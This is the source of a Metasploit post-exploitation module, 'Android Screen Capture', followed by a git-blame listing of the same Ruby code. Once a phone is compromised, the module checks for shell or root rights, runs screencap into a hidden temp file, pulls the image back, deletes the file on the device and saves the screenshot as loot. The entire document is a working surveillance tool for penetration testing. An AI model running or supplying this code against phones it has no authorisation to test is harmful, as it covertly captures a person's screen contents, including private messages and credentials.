modules/post/android/capture/screen.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Common
  include Msf::Post::File

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Android Screen Capture',
        'Description' => %q{
          This module takes a screenshot of the target phone.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'timwr' ],
        'Platform' => [ 'android' ],
        'SessionTypes' => [ 'shell', 'meterpreter' ]
      )
    )

    register_options(
      [
        OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/data/local/tmp/']),
        OptString.new('EXE_PATH', [true, 'Path to remote screencap executable', '/system/bin/screencap'])
      ]
    )
  end

  def run
    id = cmd_exec('id')
    unless id =~ (/root/) || id =~ (/shell/)
      print_error('This module requires shell or root permissions')
      return
    end

    exe_path = datastore['EXE_PATH']
    tmp_path = datastore['TMP_PATH']
    if !file?(exe_path)
      print_error('Aborting, screencap binary not found.')
      return
    end

    begin
      file = "#{tmp_path}/#{Rex::Text.rand_text_alpha(7)}.png"
      cmd_exec("#{exe_path} -p #{file}")
      print_good('Downloading screenshot...')
      data = read_file(file)
      file_rm(file)
    rescue ::Rex::Post::Meterpreter::RequestError => e
      print_error('Error taking the screenshot')
      vprint_error("#{e.class} #{e} #{e.backtrace}")
      return
    end

    unless data
      print_error('No data for screenshot')
      return
    end

    begin
      fn = 'screenshot.png'
      location = store_loot('screen_capture.screenshot', 'image/png', session, data, fn, 'Screenshot')
      print_good("Screenshot saved at #{location}")
    rescue ::IOError, ::Errno::ENOENT => e
      print_error('Error storing screenshot')
      vprint_error("#{e.class} #{e} #{e.backtrace}")
      return
    end
  end
end
add screencap for android 2015-05-25 13:36:48 +01:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
add screencap for android 2015-05-25 13:36:48 +01:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Post`
post/android/capture/screen: Use Msf::Post::Common mixin 2020-12-20 11:17:39 +00:00			`include Msf::Post::Common`
add screencap for android 2015-05-25 13:36:48 +01:00			`include Msf::Post::File`

Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Android Screen Capture',`
			`'Description' => %q{`
add screencap for android 2015-05-25 13:36:48 +01:00			`This module takes a screenshot of the target phone.`
			`},`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`'License' => MSF_LICENSE,`
			`'Author' => [ 'timwr' ],`
			`'Platform' => [ 'android' ],`
			`'SessionTypes' => [ 'shell', 'meterpreter' ]`
			`)`
			`)`
add screencap for android 2015-05-25 13:36:48 +01:00
			`register_options(`
			`[`
			`OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/data/local/tmp/']),`
			`OptString.new('EXE_PATH', [true, 'Path to remote screencap executable', '/system/bin/screencap'])`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`]`
			`)`
add screencap for android 2015-05-25 13:36:48 +01:00			`end`

			`def run`
			`id = cmd_exec('id')`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`unless id =~ (/root/) \|\| id =~ (/shell/)`
			`print_error('This module requires shell or root permissions')`
add screencap for android 2015-05-25 13:36:48 +01:00			`return`
			`end`

			`exe_path = datastore['EXE_PATH']`
			`tmp_path = datastore['TMP_PATH']`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`if !file?(exe_path)`
			`print_error('Aborting, screencap binary not found.')`
add screencap for android 2015-05-25 13:36:48 +01:00			`return`
			`end`

			`begin`
			`file = "#{tmp_path}/#{Rex::Text.rand_text_alpha(7)}.png"`
			`cmd_exec("#{exe_path} -p #{file}")`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`print_good('Downloading screenshot...')`
add screencap for android 2015-05-25 13:36:48 +01:00			`data = read_file(file)`
			`file_rm(file)`
			`rescue ::Rex::Post::Meterpreter::RequestError => e`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`print_error('Error taking the screenshot')`
add screencap for android 2015-05-25 13:36:48 +01:00			`vprint_error("#{e.class} #{e} #{e.backtrace}")`
			`return`
			`end`

			`unless data`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`print_error('No data for screenshot')`
add screencap for android 2015-05-25 13:36:48 +01:00			`return`
			`end`

			`begin`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`fn = 'screenshot.png'`
			`location = store_loot('screen_capture.screenshot', 'image/png', session, data, fn, 'Screenshot')`
add screencap for android 2015-05-25 13:36:48 +01:00			`print_good("Screenshot saved at #{location}")`
			`rescue ::IOError, ::Errno::ENOENT => e`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`print_error('Error storing screenshot')`
add screencap for android 2015-05-25 13:36:48 +01:00			`vprint_error("#{e.class} #{e} #{e.backtrace}")`
			`return`
			`end`
			`end`
			`end`